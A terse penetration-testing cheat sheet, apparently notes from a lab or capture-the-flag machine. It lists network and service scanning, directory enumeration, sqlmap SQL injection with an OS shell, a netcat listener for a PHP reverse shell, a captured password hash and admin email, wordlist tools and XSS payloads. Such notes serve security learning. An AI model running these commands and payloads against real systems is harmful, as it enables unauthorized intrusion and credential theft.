# Discover hosts on network
# Check arp table for hosts and ip numbers
arp -n -a
nmap -sP 192.168.1.1/24

Discover services:
sudo nmap -F 192.168.0.106
sudo nmap -p 1-65535 -sV -sS -T4 10.10.10.100

Discover hidden urls
Dirbuster https://github.com/foospidy/payloads/tree/master/owasp/dirbuster

nikto -h 10.10.10.100
nmap --script=http-enum 10.10.10.100

phpinfo()

http://10.10.10.100/blog/docs/



SQLi
Burp - save request, then:
sqlmap -r ./request -p email -all
sqlmap -r ./request -p email -os-shell


Upload and use reverse php shell:
nc -v -n -l -p 123


Simple PHP Blog 0.3.8

password.txt
$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/




 admin@isints.com



---- jak wygenerować liste potencjalnych haseł ------
 CeWL - custom word list generator +
 rs mangler - prefixy, postfixy, wariacje haseł =
 CeWLer



XSS

Ultimate XSS:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS test:
'';!--"<XSS>=&{()}
look for <XSS verses &lt;XSS



xxxx
